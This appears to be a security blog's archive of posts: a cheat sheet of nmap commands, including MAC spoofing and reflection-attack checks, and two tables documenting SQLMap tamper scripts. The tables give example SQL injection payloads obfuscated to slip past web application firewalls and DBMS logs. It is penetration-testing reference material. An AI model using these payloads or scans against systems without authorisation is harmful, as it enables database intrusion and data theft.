14.9.16

Some Useful Nmap Commands

Below is a list of some useful nmap commands, most of which are kept in a text on my desktop for quick reference. Detection of reflective DoS is normally a quick win, especially internally.

Display the reason a port is in its current state
nmap --reason 127.0.0.1
Show all packets sent and received
nmap --packet-trace 127.0.0.1
Determine which IP protocols are supported
nmap -sO 127.0.0.1
Find IP's not in use on a network
nmap -T4 -sP 127.0.0.1/8 && egrep “00:00:00:00:00:00” /proc/net/arp
Find rogue access points
nmap -A -p1-85,113,443,8080-8100 -T4 –min-hostgroup 50 –max-rtt-timeout 2000 –initial-rtt-timeout 300 –max-retries 3 –host-timeout 20m –max-scan-delay 1000 -oA wapscan 10.0.0.0/8

Spoof a specific mac address whilst scanning
nmap --spoof-mac 00:11:22:33:44:55 127.0.0.1

And with a random mac
nmap --spoof-mac 0 127.0.0.1

Check for UDP services vulnerable to relflection attacks (ddos)
nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 127.0.0.1/8 

4.7.16

SQLMap Tamper Scripts Update


So my last post from three years ago was pretty well received, with the rate at which SQLMap is developed it is definitely behind.

Here's an updated graph of all tamper scripts included with the latest version (as of time of writing, 04/July/2016).

I will be putting something together, possibly as a commit to the SQLMap project to aid with these. Will update once done so stay tuned.



Name Description Example
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271'
appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1'
base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw=='
between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) '%2553%2545%254C%2545%2543%2554%2520%2
546%2549%2545%254C%2544%2520%2546%2552
%254F%254D%2520%2554%2541%2542%254C%2545'
commalesslimit.py Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' ''LIMIT 3 OFFSET 2''
commalessmid.py Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' 'MID(VERSION() FROM 1 FOR 1)'
concat2concatws.py Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' 'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
charencode.py Url-encodes all characters in a given payload (not processing already encoded) '%53%45%4C%45%43%54%20%46%49%45%4C%4
4%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) '%u0053%u0045%u004C%u0045%u0043%u0054%u
0020%u0046%u0049%u0045%u004C%u0044%u002
0%u0046%u0052%u004F%u004D%u0020%u0054%
u0041%u0042%u004C%u0045'
equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' 'SELECT * FROM users WHERE id LIKE 1'
escapequotes.py Slash escape quotes (' and ") '1\\\\" AND SLEEP(5)#'
greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart '1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT
(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(
/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR
(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0N
ULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' 'IF(ISNULL(1),2,1)'
modsecurityversioned.py Embraces complete query with versioned comment '1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment '1 /*!00000AND 2>1*/--'
multiplespaces.py Adds multiple spaces around SQL keywords '1 UNION SELECT foobar'
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters '1 UNIOUNIONN SELESELECTCT 2--'
percentage.py Adds a percentage sign ('%') infront of each character '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M 
%T%A%B%L%E'
overlongutf8.py Converts all characters in a given payload (not processing already encoded) 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT
ABLE%C0%AAWHERE%C0%AA2%C0%BE1'
randomcase.py Replaces each keyword character with random case value 'INseRt'
randomcomments.py Add random comments to SQL keywords 'I/**/N/**/SERT'
securesphere.py Appends special crafted string "1 AND 1=1 and '0having'='0having'"
sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs '1 AND 9227=9227-- sp_password'
space2comment.py Replaces space character (' ') with comments '/**/' 'SELECT/**/id/**/FROM/**/users'
space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227
=9227'
space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23
lujYFWfv%0A9227=9227'
space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') '1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') '1--%0AAND--%0A9227=9227'
space2plus.py Replaces space character (' ') with plus ('+') 'SELECT+id+FROM+users'
space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Did%0DFROM%0Ausers'
symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) "1 %26%26 '1'='1"
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT '-1 UNION SELECT'
unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) '1%bf%27 AND 1=1-- '
uppercase.py Replaces each keyword character with upper case value 'INSERT'
varnish.py Append a HTTP header 'X-originating-IP' http://h30499.www3.hp.com/t5/Fortify-Application-S
ecurity/Bypassing-web-application-firewalls-using-HT
TP-headers/ba-p/6418366
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL
*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST
(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CH
AR(58,100,114,117,58))#
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL
*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFN
ULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*
/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
xforwardedfor.py Append a fake HTTP header 'X-Forwarded-For' ' headers["X-Forwarded-For"]'

7.5.15

Data Protection Flash Cards

Over at Designing for Privacy they've come up with a fantastic new way of raising data protection issues in the design process.

They've come up with a set of flash cards which are split into four categories (constraints / regulation / system / users) which can be used to conceptualize the legal, moral and ethical responsibilities of parties during the design process.

To take a look head on over to www.designingforprivacy.co.uk where you can also find the downloadable versions to print.

15.5.13

SQLMap's Tamper Scripts

THIS POST IS OUTDATED, PLEASE SEE LATEST VERSION HERE

I've been playing with SQLMap a lot recently to automate all sorts of injections, something which isn't so well documented is the tamper scripts which come with it.

Here's a graph with short explanations of what each does, maybe someone will find it useful.


Name Description Example
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271'
appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1'
base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw=='
between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--'
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1'
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded) '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
charencode.py Url-encodes all characters in a given payload (not processing already encoded) '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
equaltolike.py Replaces all occurances of operator equal ('=') with operator 'LIKE' 'SELECT * FROM users WHERE id LIKE 1'
greatest.py Replaces greater than operator ('>') with 'GREATEST' counterpart '1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
ifnull2ifisnull.py Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' 'IF(ISNULL(1),2,1)'
modsecurityversioned.py Embraces complete query with versioned comment '1 /*!30874AND 2>1*/--'
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment '1 /*!00000AND 2>1*/--'
multiplespaces.py Adds multiple spaces around SQL keywords '1 UNION SELECT foobar'
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters '1 UNIOUNIONN SELESELECTCT 2--'
percentage.py Adds a percentage sign ('%') infront of each character '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
randomcase.py Replaces each keyword character with random case value 'INseRt'
randomcomments.py Add random comments to SQL keywords 'I/**/N/**/SERT'
securesphere.py Appends special crafted string "1 AND 1=1 and '0having'='0having'"
sp_password.py Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs '1 AND 9227=9227-- sp_password'
space2comment.py Replaces space character (' ') with comments '/**/' 'SELECT/**/id/**/FROM/**/users'
space2dash.py Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
space2hash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
space2morehash.py Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
space2mssqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Eid%0DFROM%07users'
space2mssqlhash.py Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') '1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%A0id%0BFROM%0Cusers'
space2mysqldash.py Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') '1--%0AAND--%0A9227=9227'
space2plus.py Replaces space character (' ') with plus ('+') 'SELECT+id+FROM+users'
space2randomblank.py Replaces space character (' ') with a random blank character from a valid set of alternate characters 'SELECT%0Did%0DFROM%0Ausers'
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT '-1 UNION SELECT'
unmagicquotes.py Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) '1%bf%27 AND 1=1-- '
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#'
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'